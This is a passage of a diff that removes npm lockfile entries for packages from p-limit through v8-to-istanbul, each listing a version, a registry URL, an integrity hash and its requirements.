"optional": true, - "requires": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "optional": true - } - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-domain": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-4.1.0.tgz", - "integrity": "sha512-zas79foMEsbMbIcJoPx26+NISWa3jTzZykOW9mXfRzvgadHvAHGd7qcCc1FbSWbD1I4qP71UWAxlTgu7Uq6IQg==", - "requires": { - "is-ip": "^3.1.0", - "node-fetch": "^2.6.1", - "punycode": "^2.1.1" - } - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==" - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "dependencies": { - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - } - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "ts-jest": { - "version": "29.1.1", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.1.1.tgz", - "integrity": "sha512-D6xjnnbP17cC85nliwGiL+tpoKN0StpgE0TeOjXQTU6MVCfsB4v7aW05CgQ/1OywGb0x/oy9hHFnN+sczTiRaA==", - "dev": true, - "requires": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "^7.5.3", - "yargs-parser": "^21.0.1" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "4.9.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.9.5.tgz", - "integrity": "sha512-1FXk9E2Hm+QzZQ7z+McJiHL4NW1F2EzMu9Nq9i3zAaGqibafqYwCVU6WyWAuyQRRzOlxou8xZSyXLEN8oKj24g==", - "dev": true - }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": 